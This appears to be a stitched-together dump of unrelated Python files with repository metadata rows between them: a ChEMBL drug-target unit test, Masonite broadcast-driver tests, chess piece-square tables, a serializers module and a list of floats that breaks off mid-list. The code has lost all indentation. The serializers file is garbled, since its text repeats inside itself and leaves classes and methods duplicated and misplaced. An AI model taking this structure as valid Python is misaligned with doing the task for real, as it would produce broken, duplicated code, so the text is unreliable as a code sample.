code/reasoningtool/tests/QueryChEMBLTests.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 31
|
2018-03-05T20:01:10.000Z
|
2022-02-01T03:31:22.000Z
|
code/reasoningtool/tests/QueryChEMBLTests.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 1,774
|
2018-03-06T01:55:03.000Z
|
2022-03-31T03:09:04.000Z
|
code/reasoningtool/tests/QueryChEMBLTests.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 19
|
2018-05-10T00:43:19.000Z
|
2022-03-08T19:26:16.000Z
|
import unittest
from QueryChEMBL import QueryChEMBL as QC
class QueryChEMBLTestCase(unittest.TestCase):
def test_get_target_uniprot_ids_for_drug(self):
ret_dict = QC.get_target_uniprot_ids_for_drug('clothiapine')
known_dict = {'P21728': 0.99999999997, 'P21918': 0.9999999824,
'P14416': 0.99996980427, 'P35367': 0.99996179618,
'P08913': 0.99973447457, 'P18089': 0.99638618971,
'P21917': 0.99500274146, 'P28335': 0.98581821496,
'P18825': 0.97356918354, 'P28223': 0.96867458111,
'Q9H3N8': 0.83028164473, 'P34969': 0.39141293908,
'P41595': 0.31891025293, 'P08173': 0.18274693348,
'P11229': 0.16526971365, 'P04637': 0.12499267788,
'P35462': 0.11109632984, 'P10635': 0.09162534744,
'P25100': 0.0855003718, 'P06746': 0.04246537619}
self.assertDictEqual(ret_dict, known_dict)
def test_get_chembl_ids_for_drug(self):
ret_set = QC.get_chembl_ids_for_drug('clothiapine')
known_set = {'CHEMBL304902'}
self.assertSetEqual(ret_set, known_set)
def test_get_target_uniprot_ids_for_chembl_id(self):
ret_dict = QC.get_target_uniprot_ids_for_chembl_id('CHEMBL304902')
known_dict = {'P21728': 0.99999999997, 'P21918': 0.9999999824,
'P14416': 0.99996980427, 'P35367': 0.99996179618,
'P08913': 0.99973447457, 'P18089': 0.99638618971,
'P21917': 0.99500274146, 'P28335': 0.98581821496,
'P18825': 0.97356918354, 'P28223': 0.96867458111,
'Q9H3N8': 0.83028164473, 'P34969': 0.39141293908,
'P41595': 0.31891025293, 'P08173': 0.18274693348,
'P11229': 0.16526971365, 'P04637': 0.12499267788,
'P35462': 0.11109632984, 'P10635': 0.09162534744,
'P25100': 0.0855003718, 'P06746': 0.04246537619}
self.assertDictEqual(ret_dict, known_dict)
if __name__ == '__main__':
unittest.main()
| 45.574468
| 74
| 0.590103
| 219
| 2,142
| 5.52968
| 0.328767
| 0.029728
| 0.052849
| 0.062758
| 0.848885
| 0.78943
| 0.782824
| 0.721718
| 0.721718
| 0.663914
| 0
| 0.448819
| 0.288515
| 2,142
| 46
| 75
| 46.565217
| 0.345801
| 0
| 0
| 0.628571
| 0
| 0
| 0.137255
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 1
| 0.085714
| false
| 0
| 0.057143
| 0
| 0.171429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
58b758e48bb642bf4d6e205617c386b59058caf8
| 3,536
|
py
|
Python
|
tests/broadcasts/test_sockets.py
|
rickavmaniac/masonite
|
cf085a806123ef267ef0d07d828dcca0a6d1e6b2
|
[
"MIT"
] | 1
|
2022-02-24T06:21:18.000Z
|
2022-02-24T06:21:18.000Z
|
tests/broadcasts/test_sockets.py
|
rickavmaniac/masonite
|
cf085a806123ef267ef0d07d828dcca0a6d1e6b2
|
[
"MIT"
] | null | null | null |
tests/broadcasts/test_sockets.py
|
rickavmaniac/masonite
|
cf085a806123ef267ef0d07d828dcca0a6d1e6b2
|
[
"MIT"
] | null | null | null |
import os
import unittest
from src.masonite.drivers import BroadcastPusherDriver
from src.masonite.managers import BroadcastManager
from src.masonite.testing import TestCase
class TestSockets(TestCase):
def setUp(self):
super().setUp()
self.container.bind('BroadcastPusherDriver', BroadcastPusherDriver)
self.container.bind('BroadcastManager', BroadcastManager)
# skip tests depending on drivers keys presence
self.run_pusher_tests = bool(os.getenv('PUSHER_SECRET'))
self.run_ably_tests = bool(os.getenv('ABLY_SECRET'))
self.run_pubnub_tests = bool(os.getenv('PUBNUB_SECRET'))
def test_broadcast_loads_into_container(self):
if not self.run_pusher_tests:
self.skipTest("require Pusher keys")
self.container.bind('Broadcast', self.container.make('BroadcastManager').driver('pusher'))
self.assertIsNotNone(self.container.make('BroadcastManager'))
self.assertEqual(self.container.make('Broadcast').channel('random', 'from driver'), {'message': 'from driver'})
self.assertEqual(self.container.make('Broadcast').channel('random', {'message': 'dictionary'}), {'message': 'dictionary'})
self.assertEqual(self.container.make('Broadcast').channel(['channel1', 'channel2'], {'message': 'dictionary'}), {'message': 'dictionary'})
self.assertEqual(self.container.make('Broadcast').channel(['channel1', 'channel2'], {'message': 'dictionary'}, 'test-event'), {'message': 'dictionary'})
self.assertTrue(self.container.make('Broadcast').ssl(True).ssl_message)
def test_broadcast_loads_into_container_with_ably(self):
if not self.run_ably_tests:
self.skipTest("require Ably keys")
self.container.bind('Broadcast', self.container.make('BroadcastManager').driver('ably'))
self.assertIsNotNone(self.container.make('BroadcastManager'))
self.assertEqual(self.container.make('Broadcast').channel('test-channel', 'from driver'), {'message': 'from driver'})
self.assertEqual(self.container.make('Broadcast').channel('test-channel', {'message': 'from driver'}), {'message': 'from driver'})
self.assertEqual(self.container.make('Broadcast').channel(['channel-1', 'channel-2'], {'message': 'dictionary'}), {'message': 'dictionary'})
self.assertEqual(self.container.make('Broadcast').channel(['channel-1', 'channel-2'], {'message': 'dictionary'}, 'test-event'), {'message': 'dictionary'})
self.assertTrue(self.container.make('Broadcast').ssl(True).ssl_message)
def test_broadcast_loads_into_container_with_pubnub(self):
if not self.run_pubnub_tests:
self.skipTest("require PubNub keys")
self.container.bind('Broadcast', self.container.make('BroadcastManager').driver('pubnub'))
self.assertIsNotNone(self.container.make('BroadcastManager'))
self.assertEqual(self.container.make('Broadcast').channel('test-channel', 'from driver'), {'message': 'from driver'})
self.assertEqual(self.container.make('Broadcast').channel('test-channel', {'message': 'from driver'}), {'message': 'from driver'})
self.assertEqual(self.container.make('Broadcast').channel(['channel-1', 'channel-2'], {'message': 'dictionary'}), {'message': 'dictionary'})
self.assertEqual(self.container.make('Broadcast').channel(['channel-1', 'channel-2'], {'message': 'dictionary'}, 'test-event'), {'message': 'dictionary'})
self.assertTrue(self.container.make('Broadcast').ssl(True).ssl_message)
| 65.481481
| 162
| 0.697115
| 385
| 3,536
| 6.314286
| 0.150649
| 0.139037
| 0.146853
| 0.160428
| 0.754422
| 0.734677
| 0.720691
| 0.720691
| 0.715755
| 0.715755
| 0
| 0.003905
| 0.130939
| 3,536
| 53
| 163
| 66.716981
| 0.787179
| 0.012726
| 0
| 0.325581
| 0
| 0
| 0.284895
| 0.006019
| 0
| 0
| 0
| 0
| 0.418605
| 1
| 0.093023
| false
| 0
| 0.116279
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58f4cd23e5825d5db1dbaded94769e239602ba35
| 2,843
|
py
|
Python
|
ChessAI/ChessPlayer/BotPlayer/figure_cost.py
|
PavelLebed20/chess_classic
|
72f7d08cadae8db9c65d61411bcdc8c79bfa04c3
|
[
"Apache-2.0"
] | 1
|
2019-06-04T11:08:55.000Z
|
2019-06-04T11:08:55.000Z
|
ChessAI/ChessPlayer/BotPlayer/figure_cost.py
|
PavelLebed20/chess_classic
|
72f7d08cadae8db9c65d61411bcdc8c79bfa04c3
|
[
"Apache-2.0"
] | 115
|
2019-03-02T08:02:50.000Z
|
2019-06-02T16:28:00.000Z
|
ChessAI/ChessPlayer/BotPlayer/figure_cost.py
|
PavelLebed20/chess_classic
|
72f7d08cadae8db9c65d61411bcdc8c79bfa04c3
|
[
"Apache-2.0"
] | null | null | null |
pawn_cost = [
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0],
[1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0],
[0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5],
[0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0],
[0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5],
[0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
rook_cost = [
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5],
[-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
[-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
[-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
[-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
[-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],
[0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0]
]
knight_cost = [
[-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0],
[-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0],
[-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0],
[-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0],
[-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0],
[-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0],
[-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0],
[-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0]
]
bishop_cost = [
[-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0],
[-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],
[-1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0],
[-1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0],
[-1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0],
[-1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0],
[-1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0],
[-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0]
]
queen_cost = [
[-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0],
[-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],
[-1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],
[-0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],
[0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],
[-1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],
[-1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0],
[-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0]
]
king_cost = [
[-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
[-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
[-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
[-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],
[-2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0],
[-1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0],
[2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0],
[2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0]
]
| 43.738462
| 61
| 0.29089
| 780
| 2,843
| 1.052564
| 0.016667
| 0.596833
| 0.697929
| 0.769793
| 0.950061
| 0.940317
| 0.9257
| 0.90134
| 0.868453
| 0.762485
| 0
| 0.414239
| 0.347872
| 2,843
| 64
| 62
| 44.421875
| 0.028587
| 0
| 0
| 0.220339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
4520232d223d736092916e501854fac6fd19e33a
| 1,672
|
py
|
Python
|
learning_new_technique_sandbox/src/desing_pattern/factory_method/serializers.py
|
qingchaowang/learning_sandbox
|
cfc756bc5abd944935213b2ef90beab7d40d5d18
|
[
"MIT"
] | null | null | null |
learning_new_technique_sandbox/src/desing_pattern/factory_method/serializers.py
|
qingchaowang/learning_sandbox
|
cfc756bc5abd944935213b2ef90beab7d40d5d18
|
[
"MIT"
] | null | null | null |
learning_new_technique_sandbox/src/desing_pattern/factory_method/serializers.py
|
qingchaowang/learning_sandbox
|
cfc756bc5abd944935213b2ef90beab7d40d5d18
|
[
"MIT"
] | null | null | null |
# In serializers.py
import json
import xml.etree.ElementTree as et
class JsonSerializer:
def __init__(self):
self._current_object = None# In serializers.py
import json
import xml.etree.ElementTree as et
class JsonSerializer:
def __init__(self):
self._current_object = None
def start_object(self, object_name, object_id):
self._current_object = {
'id': object_id
}
def add_property(self, name, value):
self._current_object[name] = value
def to_str(self):
return json.dumps(self._current_object)
class XmlSerializer:
def __init__(self):
self._element = None
def start_object(self, object_name, object_id):
self._element = et.Element(object_name, attrib={'id': object_id})
def add_property(self, name, value):
prop = et.SubElement(self._element, name)
prop.text = value
def to_str(self):
return et.tostring(self._element, encoding='unicode')
def start_object(self, object_name, object_id):
self._current_object = {
'id': object_id
}
def add_property(self, name, value):
self._current_object[name] = value
def to_str(self):
return json.dumps(self._current_object)
class XmlSerializer:
def __init__(self):
self._element = None
def start_object(self, object_name, object_id):
self._element = et.Element(object_name, attrib={'id': object_id})
def add_property(self, name, value):
prop = et.SubElement(self._element, name)
prop.text = value
def to_str(self):
return et.tostring(self._element, encoding='unicode')
| 24.955224
| 73
| 0.656699
| 214
| 1,672
| 4.82243
| 0.172897
| 0.077519
| 0.131783
| 0.05814
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.241627
| 1,672
| 67
| 74
| 24.955224
| 0.81388
| 0.020933
| 0
| 0.956522
| 0
| 0
| 0.013456
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.347826
| false
| 0
| 0.086957
| 0.086957
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
18f88648a1b22ced8b5694a10b9e45b968aa2a62
| 62,227
|
py
|
Python
|
app/python/testing/user_input_files/KS_input_examples.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 6
|
2016-04-14T11:47:43.000Z
|
2022-01-29T14:34:59.000Z
|
app/python/testing/user_input_files/KS_input_examples.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 2
|
2019-12-21T12:15:46.000Z
|
2021-01-08T12:22:17.000Z
|
app/python/testing/user_input_files/KS_input_examples.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 1
|
2021-03-04T10:26:18.000Z
|
2021-03-04T10:26:18.000Z
|
fg_1 = [2.71355896020348, 2.59658440428213, 2.45153772275136]
bg_1 = [-8.32643470076795, -8.12926078021377, -8.06480495716629, -7.91650311880841, -7.83801246222857, -7.70583778501837, -7.52738966855758, -7.49777367765364, -7.46651942330827, -7.42355926825873, -7.30100855923803, -7.26350122359286, -7.19468100328791, -7.13961252138971, -7.05545005462474, -7.03430813260908, -7.03089483430696, -7.02251373739152, -6.86645118823921, -6.85898908383128, -6.84855344412137, -6.76730879143088, -6.7664972463577, -6.69533136777946, -6.61277822936154, -6.58502157909065, -6.57284941377777, -6.48626842620612, -6.45986392537447, -6.441174858703, -6.41827521708809, -6.38452118966051, -6.36363468782975, -6.36076969181797, -6.26240701383164, -6.25317971847765, -6.2365389484951, -6.15648608681838, -6.15346814841415, -6.13426879717682, -6.08299484961717, -6.07448195514896, -6.07291813132705, -5.99612353985798, -5.98325289595672, -5.97435574341204, -5.95224905793447, -5.94667848489343, -5.9334583297072, -5.93251599928652, -5.89242499010306, -5.89125543330919, -5.87878829845967, -5.87466394085314, -5.8294477431172, -5.80105853438803, -5.77627544673249, -5.77570752439622, -5.77316736458519, -5.77104152357156, -5.73460384423021, -5.73224218231378, -5.71982626290828, -5.70008179669666, -5.69996938749922, -5.68781951940129, -5.64240743669934, -5.62788710170745, -5.60912454884795, -5.60733066321827, -5.58805534802067, -5.58482481806554, -5.5794352703236, -5.53619100793383, -5.5266917671331, -5.5013015283131, -5.49985868979162, -5.48514216653179, -5.47736351108885, -5.44794192762878, -5.44554285489525, -5.43436122520384, -5.43024773291195, -5.37874070417799, -5.37704368474112, -5.35464917492812, -5.34442189805867, -5.33991419491576, -5.32868519351564, -5.31778213754401, -5.30306045586955, -5.3018475947231, -5.30091946696228, -5.25002227237239, -5.20584852774195, -5.20379059906394, -5.17743188426567, -5.16932479991793, -5.15031174731268, -5.13724801369195, -5.13307999171822, -5.11070697893696, -5.10240145654282, -5.07286140986759, -5.02760949945728, -4.99389860645012, -4.99228153882051, -4.99158560578963, -4.98205158522702, -4.96403610389916, -4.96328578973434, -4.94830439636911, -4.93906291736347, -4.92474749895853, -4.92445006776066, -4.89244047976311, -4.88765714056338, -4.88446663436502, -4.85908698649547, -4.85596846974296, -4.85301720947498, -4.84994872577491, -4.82468714549179, -4.82093054094259, -4.81719423395266, -4.79960585993681, -4.79450958271145, -4.77593074310967, -4.76841931287922, -4.76152297009406, -4.73846761455964, -4.73556791826794, -4.7185781141044, -4.712204905786, -4.7085871626959, -4.65837612363627, -4.65427993822297, -4.64096368709234, -4.63976609134064, -4.63606798349776, -4.62230545208703, -4.61119941428037, -4.6101644135773, -4.60505070674488, -4.60216228476108, -4.56137108384481, -4.55919537628411, -4.55335737628244, -4.55119618911966, -4.54980192690798, -4.54762237714311, -4.54188476930851, -4.53663518485849, -4.53058010718047, -4.51933985531769, -4.48348483127313, -4.4789489171353, -4.47394478794731, -4.46774231867997, -4.44509259526265, -4.44393091915643, -4.41519434826907, -4.40567579039357, -4.38984168168106, -4.38016997298702, -4.35618957798525, -4.35084831820702, -4.35027464418738, -4.34908071042421, -4.32140309049286, -4.3026983120069, -4.28127018096359, -4.26972319433717, -4.26279848868902, -4.25560959729774, -4.25373930341165, -4.23797385436194, -4.23669738961331, -4.22149916876285, -4.18723301641402, -4.18190189283134, -4.18100834652305, -4.16968343025405, -4.14868010962359, -4.14457377659363, -4.14239705929054, -4.14047669165511, -4.11415349374522, -4.11135553123405, -4.10575170887277, -4.09232563163418, -4.09001981140879, -4.08683323132099, -4.06467422195542, -4.06015133811765, -4.05869532969368, -4.04635050515043, -4.03120132024633, -4.01617685055156, -3.96666702360362, -3.96111826986238, -3.96088412029899, -3.92779757574645, -3.92663168005016, -3.91628868482989, -3.90326485061218, -3.8902413394591, -3.88856013085311, -3.88853056225145, -3.88646320176686, -3.86721023073069, -3.86668849343774, -3.86148832472908, -3.86053574623235, -3.86008300380152, -3.83684112266378, -3.83282840214479, -3.81732132568477, -3.78993550268502, -3.78016445091877, -3.77412655275942, -3.77249249109146, -3.74057457477842, -3.73755650219373, -3.73226395329731, -3.72386617201012, -3.72021562121906, -3.71898137800479, -3.71465105176757, -3.70112389718105, -3.6727357100468, -3.65198571605545, -3.64391833103247, -3.6297016692636, -3.62810333515983, -3.608608201615, -3.58299251896378, -3.5821486739471, -3.57436950378065, -3.57244462966279, -3.56929711128091, -3.56414715368633, -3.5465551444108, -3.54574405303921, -3.54378507078218, -3.54374843954636, -3.53627979821756, -3.53243955993852, -3.5291363433243, -3.52643657837631, -3.52506369870443, -3.51789646877019, -3.51576723748925, -3.50927661941198, -3.50798217407424, -3.48539377978139, -3.47420239243753, -3.46141463323791, -3.46024518051199, -3.45973890216053, -3.45875555338156, -3.41725292690291, -3.41497199034076, -3.41104150037547, -3.39358717592219, -3.39213960981569, -3.38745902791139, -3.38348051871965, -3.37430019897601, -3.36031348867417, -3.34441155395612, -3.34229004818493, -3.32998660406781, -3.31605346212567, -3.30959669083528, -3.30698486763005, -3.30236924631106, -3.29820033833118, -3.29401239991304, -3.29346112379973, -3.29070668028697, -3.28648843706492, -3.27989558333408, -3.27691418241743, -3.27200608439279, -3.27058992995483, -3.26573893978849, -3.25113134851702, -3.24546302689538, -3.24467195487936, -3.23935453458173, -3.23110167819537, -3.2238276633626, -3.21674202072185, -3.20865216914659, -3.19892803116475, -3.18854086902297, -3.18423974989327, -3.18265949423004, -3.16870357712785, -3.16532353749055, -3.15622209295322, -3.1552324492251, -3.15395372424389, -3.15118990810437, -3.13021741861799, -3.12559133401462, -3.11240135367784, -3.11217628549985, -3.10828152469296, -3.10533515880712, -3.10308704679552, -3.09299592894098, -3.09093642543836, -3.09079988688351, -3.08997117150615, -3.07307851860216, -3.07210350144952, -3.06415790295611, -3.05788627034772, -3.05162979971371, -3.05078244282525, -3.05043285501393, -3.04950378251821, -3.0392394168758, -3.03511181367061, -3.0349059504027, -3.02833441418166, -3.025363962075, -3.01031424112599, -2.99641559568854, -2.98536912788274, -2.98489702593985, -2.98008594073884, -2.97765479033361, -2.97339459676949, -2.97027828134747, -2.96776098678398, -2.96512122723563, -2.96421529567905, -2.96251814148259, -2.95549465020861, -2.95408873676075, -2.95281226047047, -2.9344291340757, -2.93432434536786, -2.93002562218533, -2.92900680356523, -2.92694516038843, -2.92587242998372, -2.92503107366644, -2.92065571663921, -2.9110643721586, -2.89443532386475, -2.89442844994519, -2.86978685645832, -2.85943837208249, -2.85387228779441, -2.83373560028208, -2.83254376531638, -2.82702383493164, -2.82083700652804, -2.81850808228868, -2.80867573129957, -2.80781001620288, -2.80048681845322, -2.80032756014568, -2.79741968162439, -2.79596140349676, -2.78506132231634, -2.78284483026523, -2.7800802743299, -2.77780812004533, -2.76859332955662, -2.76224188325119, -2.74638852169022, -2.74189460920298, -2.74176761117359, -2.73705167951016, -2.73572136828971, -2.72884879914086, -2.72804003474724, -2.72802748955124, -2.72121307897118, -2.71132694596897, -2.7106737455993, -2.69221752992228, -2.6858838877386, -2.67936620209641, -2.67742461607703, -2.67522471223764, -2.67468122321351, -2.66706478775549, -2.66542815683533, -2.6638899973071, -2.6591427901747, -2.65449278371109, -2.6498856835267, -2.6468478815723, -2.64132067622366, -2.62703509095644, -2.62600762120414, -2.6255669632796, -2.62543650333752, -2.6248465982971, -2.62479477935021, -2.62156069698757, -2.6196490309563, -2.6189845962678, -2.61734717079125, -2.61395378406467, -2.60130128799689, -2.59894719086357, -2.59803358347537, -2.59268243788184, -2.5881980630896, -2.58650578537472, -2.58323535214077, -2.57377538537865, -2.56855584008607, -2.56732158394214, -2.5620420166921, -2.56155766302635, -2.55893433096706, -2.54877246832393, -2.54620547834289, -2.53769881863222, -2.52879229374978, -2.52689232596764, -2.5222870603308, -2.51900276142976, -2.50285674743039, -2.50031889131413, -2.4949158812924, -2.49139711942209, -2.48812939258639, -2.48383568506359, -2.47998929963482, -2.47588659071293, -2.47212391684667, -2.46868127491303, -2.4666390582227, -2.46268553769944, -2.45542879893428, -2.45313080031999, -2.45058338417446, -2.43997330504517, -2.4388147705156, -2.43675681357139, -2.43362585935822, -2.4320543755034, -2.43034015973118, -2.42975616820674, -2.4284167206258, -2.42840120325971, -2.42557735615568, -2.41752122107817, -2.41695562741707, -2.41469603158351, -2.40765091259847, -2.40099303490722, -2.39761029925005, -2.39143127517876, -2.38921730971439, -2.37354485968924, -2.37008913736568, -2.36907875332741, -2.36085587755146, -2.35541216581853, -2.35499775477767, -2.35483214155369, -2.35070694879604, -2.34524287183516, -2.34507119777619, -2.34349521897481, -2.33765735033273, -2.3302582533367, -2.32533368220489, -2.3130760663946, -2.30834983167064, -2.30614355271168, -2.30436640666394, -2.2959493427459, -2.29560949598717, -2.29415492436455, -2.28988219699669, -2.27987657429476, -2.26747189590981, -2.26728600354136, -2.26217920539588, -2.25995201153298, -2.25868195286177, -2.24643023228834, -2.24419337219989, -2.22646753427998, -2.2248842157761, -2.21857327985432, -2.21673728593081, -2.21105867150559, -2.20860428693124, -2.20703342922843, -2.20663361700686, -2.20583784790456, -2.19848235739652, -2.19315969555728, -2.19199814376301, -2.19073833511308, -2.17433630908843, -2.17346520150056, -2.16156703827477, -2.16073137533335, -2.15399869414511, -2.15258549410078, -2.14925922904975, -2.14499668676072, -2.14446876519314, -2.13380114327829, -2.13157357686132, -2.13152501741489, -2.12564373875284, -2.12083939056405, -2.11616109041893, -2.11533374684416, -2.1153073664903, -2.10681104845128, -2.10574664635352, -2.10277015776226, -2.1012183024032, -2.1004697087009, -2.09468160013629, -2.09149244560058, -2.08205219304469, -2.07685709593545, -2.07345361601096, -2.07211556813827, -2.05252517024539, -2.04934610492274, -2.04871672377998, -2.04670854627056, -2.0400029596935, -2.03931378429032, -2.03808888829879, -2.03375667864032, -2.03072390622845, -2.02359300958761, -2.01988602190739, -2.01474367779591, -2.00669398273574, -2.00354457486203, -1.99369290915384, -1.99024871387742, -1.98445859115386, -1.9821294855594, -1.97924778860837, -1.96692563333921, -1.96492470874042, -1.9644918223324, -1.96084409424985, -1.95320676156059, -1.93599010446892, -1.93441506584989, -1.9336134502564, -1.92805935288047, -1.9280244354887, -1.91901672737759, -1.91272578031586, -1.91150876386419, -1.90073423791214, -1.89957983020343, -1.88765495072017, -1.88622428890795, -1.88608611875168, -1.88531486347853, -1.87717273864848, -1.87658305870155, -1.87549862121653, -1.87073425916746, -1.86981225704331, -1.86872330459009, -1.86639491917143, -1.86529601002448, -1.86103342961632, -1.85776566863776, -1.84885822239558, -1.84457033937804, -1.84133858785801, -1.83923593052807, -1.83372921246915, -1.82417848446868, -1.82095539634476, -1.81888404766071, -1.81299618469462, -1.80668342478886, -1.80258262438383, -1.79870864312059, -1.79617739391335, -1.79598032193387, -1.79344908452896, -1.79246569229923, -1.79032319641819, -1.78872160656364, -1.78542927907352, -1.78492531186077, -1.78444022854041, -1.78298712630417, -1.78257525222681, -1.78066956692608, -1.77724586121844, -1.77603743244057, -1.77497437252417, -1.76432868130879, -1.76430636567513, -1.75838803509438, -1.75353711286565, -1.75307104343078, -1.75186748297339, -1.75169097375475, -1.74943505108089, -1.74866732133724, -1.7466271458849, -1.74620593433065, -1.74454422989634, -1.74449082726857, -1.73799975015413, -1.72817956395629, -1.72681720539307, -1.72553416973442, -1.7194947508813, -1.71809131961518, -1.71584421005811, -1.71459267042556, -1.71150902527557, -1.71142438616402, -1.70896476317588, -1.70724457088539, -1.7017517285505, -1.69998651599094, -1.69071358483784, -1.68920231264234, -1.68886993315355, -1.67714395258884, -1.66454274603339, -1.66290029197517, -1.65387857628297, -1.65242706346631, -1.65007686752239, -1.64979257195518, -1.64740574748032, -1.64478507070937, -1.63691527242944, -1.63541426577976, -1.6327064573579, -1.63265623866541, -1.63148041397343, -1.62971495288362, -1.62503259960895, -1.62280426560118, -1.61989195197603, -1.61039430903756, -1.60001928103155, -1.59717098280561, -1.59474711580785, -1.59455861619267, -1.59226994066529, -1.58219629028104, -1.58050160213268, -1.57554015279906, -1.57507155306422, -1.5732595618904, -1.571786907985, -1.56617034525202, -1.5630080754445, -1.55512318728101, -1.55174935433394, -1.54963968438918, -1.53477639911934, -1.53247120433308, -1.53241289360217, -1.53206025842873, -1.53014869245035, -1.5255748391867, -1.52499561770544, -1.52149753136422, -1.51907576624032, -1.51788004125355, -1.50196896772363, -1.49754270499549, -1.49752942111276, -1.49314621137239, -1.48357161450625, -1.47396214308553, -1.47087249010024, -1.46898302979973, -1.46611547540387, -1.46500561776518, -1.45595699028627, -1.45490778922291, -1.44350058978854, -1.44089317066432, -1.43555137796401, -1.42790013474591, -1.42177423917028, -1.41703537765471, -1.41404386184681, -1.40567571616606, -1.3993016143028, -1.39744741025476, -1.39650055236661, -1.38821615675844, -1.37981917491177, -1.34453217829785, -1.33543223554228, -1.32748620572223, -1.32619807482176, -1.32256908092003, -1.32086656554565, -1.31093958956234, -1.30612644055616, -1.30218378750615, -1.292390189237, -1.28624821180639, -1.2837370442399, -1.26135848707404, -1.26076130475925, -1.25880691794561, -1.25144698413725, -1.25040616920522, -1.24795259106321, -1.24462610121405, -1.23520396459594, -1.23258565931548, 